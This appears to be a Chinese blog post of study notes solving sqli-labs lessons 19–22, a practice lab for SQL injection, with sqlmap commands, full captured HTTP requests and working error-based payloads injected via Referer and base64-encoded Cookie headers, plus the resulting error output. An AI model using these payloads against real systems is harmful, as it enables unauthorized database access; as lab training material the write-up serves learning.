一共有5个等级(1-5) 不加 level 时,默认是1

5级包含的payload最多,会自动破解出cookie、XFF等头部注入,相对应他的速度也比较慢。

level=2 http cookie会测试

level=3 http user-agent/referer头会测试

在不能确定哪个payload或参数为注入点时,建议使用高的level值。


Less-19

date:2020-11-22 10:01:30

过程

sqlmap

bp抓包右键copy to file生成19.txt

python sqlmap.py -r 19.txt --level=5 --risk=3 --dbs --batch

后续同less-11

手工注入

看标题,referer注入,看来后面的题目都是头注入了

打开hackbar,点击post data,输入正确的用户名密码,提示我的referer是啥啥啥,再次确定就是referer头注入

不知道为啥hackbar同时搞postdata和referer,referer没有起作用,上bp:

POST /Less-19/ HTTP/1.1Host: www.sqli-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://www.sqli-labs.com/Less-19/'Content-Type: application/x-www-form-urlencodedContent-Length: 34Origin: http://www.sqli-labs.comDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheuname=admin&passwd=1&submit=Submit

输出:

<br>Your IP ADDRESS is: 127.0.0.1<br><font color= "#FFFF00" font size = 3 ></font><font color= "#0000ff" font size = 3 >Your Referer is: http://www.sqli-labs.com/Less-19/'</font><br>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '127.0.0.1')' at line 1<br><br><img src="../images/flag.jpg" /><br>

又是insert操作啦,利用报错注入extractvalue()拿当前数据库名

POST /Less-19/ HTTP/1.1Host: www.sqli-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://www.sqli-labs.com/Less-19/', extractvalue(1,concat('~',database()))) # Content-Type: application/x-www-form-urlencodedContent-Length: 35Origin: http://www.sqli-labs.comDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheuname=admin&passwd=1&submit=Submit 

根据输出,拿到当前数据库名security:

<br>Your IP ADDRESS is: 127.0.0.1<br><font color= "#FFFF00" font size = 3 ></font><font color= "#0000ff" font size = 3 >Your Referer is: http://www.sqli-labs.com/Less-19/', extractvalue(1,concat('~',database()))) #</font><br>XPATH syntax error: '~security'<br><br><img src="../images/flag.jpg" /><br>

后续操作同less-11

总结

sqlmap新操作,感觉它不太行了?应该是我不太行,去百度sqlmap的使用姿势


Less-20

date:2020-11-22 10:17:02

过程

sqlmap

bp抓包右键copy to file生成20.txt

python sqlmap.py -r 22.txt --level=5 --risk=3 --dbs --batch

后续同less-11

手工注入

先用admin\1登录

题目给了我的cookie:

YOUR USER AGENT IS : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0YOUR IP ADDRESS IS : 127.0.0.1DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIREYOUR COOKIE : uname = admin and expires: Sun 22 Nov 2020 - 11:22:50Your Login name:adminYour Password:1Your ID:8

那就cookie注入呗,bp抓包

GET /Less-20/index.php HTTP/1.1Host: www.sqli-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://www.sqli-labs.com/Less-20/index.phpDNT: 1Connection: closeCookie: uname=adminUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cache

cookie后单引号开战

Cookie: uname=admin'

输出:

>Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin'' LIMIT 0,1' at line 1

后面的sql橘子拿到了,就开始常规姿势闭合,拿database()

payload:

Cookie: uname=admin' and extractvalue(1,concat('~',database())) # 

输出,拿到库名security:

Issue with your mysql: XPATH syntax error: '~security'

拿字段内容同less-11

总结

报错注入真好用

前面写了题,后面就越写越快了,开心


Less-21

date:2020-11-22 10:29:18

过程

sqlmap

bp抓包右键copy to file生成21.txt

python sqlmap.py -r 22.txt --level=5 --risk=3 --dbs --batch

后续同less-11

手工注入

老规矩,输入17关重置后的账户密码admin/1

题目还是cookie注入:

YOUR USER AGENT IS : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0YOUR IP ADDRESS IS : 127.0.0.1DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIREYOUR COOKIE : uname = YWRtaW4= and expires: Sun 22 Nov 2020 - 11:29:55Your Login name:adminYour Password:1Your ID:8

看标题是复杂版的...

啊这,先试试引号,竟然不报错了!

有趣

看了下题目uname那里发生了改变,抓包发现uname是YWRtaW4,改成admin试试

Cookie: uname=admin"

输出

>Issue with your mysql: Illegal mix of collations (gbk_chinese_ci,IMPLICIT) and (latin1_swedish_ci,COERCIBLE) for operation '='

说是编码集的问题,好叭我去百度闯关秘籍了

对cookie的值进行了base64的处理,其他和20关一样

也就是说在注入的时候需要把注入语句搞一下编码,打开hackbar,打开base64编码,输入admin'

bp发包设置cookie

Cookie: uname=YWRtaW4n

输出:

>Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin'') LIMIT 0,1' at line 1

拿到后面的句子,开始闭合注入,不知为何我转义后的报错注入代码放进payload没有反应,换一个加密工具就好了

用报错注入拿数据

明文:admin') and extractvalue(1,concat(',',database())) # base64转义:YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCcsJyxkYXRhYmFzZSgpKSkgIyA=设置cookie:Cookie: uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCcsJyxkYXRhYmFzZSgpKSkgIyA=

输出:

>YOUR COOKIE : uname = YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCcsJyxkYXRhYmFzZSgpKSkgIyA= and expires: Sun 22 Nov 2020 - 12:30:51<br></font>Issue with your mysql: XPATH syntax error: ',security'

拿到数据库名,拿别的数据同less-11

总结

base64使用场景及原理

base64 最早就是用来邮件传输协议中的,原因是邮件传输协议只支持 ascii 字符传递,因此如果要传输二进制文件,如:图片、视频是无法实现的。

因此 base64 就可以用来将二进制文件内容编码为只包含 ascii 字符的内容。

我们知道在计算机中任何数据都是按ascii码存储的,而ascii码的128~255之间的值是不可见字符。而在网络上交换数据时,比如说从A地传到B地,往往要经过多个路由设备,由于不同的设备对字符的处理方式有一些不同,这样那些不可见字符就有可能被处理错误,这是不利于传输的。所以就先把数据先做一个Base64编码,统统变成可见字符,这样出错的可能性就大降低了。


Less-22

date:2020-11-22 11:35:53

过程

sqlmap

bp抓包右键copy to file生成22.txt

python sqlmap.py -r 22.txt --level=5 --risk=3 --dbs --batch

后续同less-11

手工注入

还是用admin\1登录,显示cookie,那就还是cookie注入

YOUR USER AGENT IS : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0YOUR IP ADDRESS IS : 127.0.0.1DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIREYOUR COOKIE : uname = YWRtaW4= and expires: Sun 22 Nov 2020 - 12:37:26Your Login name:adminYour Password:1Your ID:8

看见uname = YWRtaW4= ,那就应该还是用base64加密

使用上一题的payload

明文:admin') and extractvalue(1,concat(',',database())) # base64:YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCcsJyxkYXRhYmFzZSgpKSkgIyA=

发现没有报错显示,那么说明没有闭合成功,看标题是双引号闭合,那就改一下引号

明文:admin") and extractvalue(1,concat(',',database())) # base64:YWRtaW4iKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCcsJyxkYXRhYmFzZSgpKSkgIyA=

输出:

Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') and extractvalue(1,concat(',',database())) # " LIMIT 0,1' at line 1

哪到后面的sql语句,发现只需要闭合一个双引号,不需要),开干

明文:admin" and extractvalue(1,concat(',',database())) # base64:YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoJywnLGRhdGFiYXNlKCkpKSAjIA==

输出:

Issue with your mysql: XPATH syntax error: ',security'

拿到数据库名,拿别的数据同less-11

总结

我发现sqlmap跑得有一点慢

posted @ 2021-06-24 16:20  milkii0  阅读(361)  评论(0编辑  收藏  举报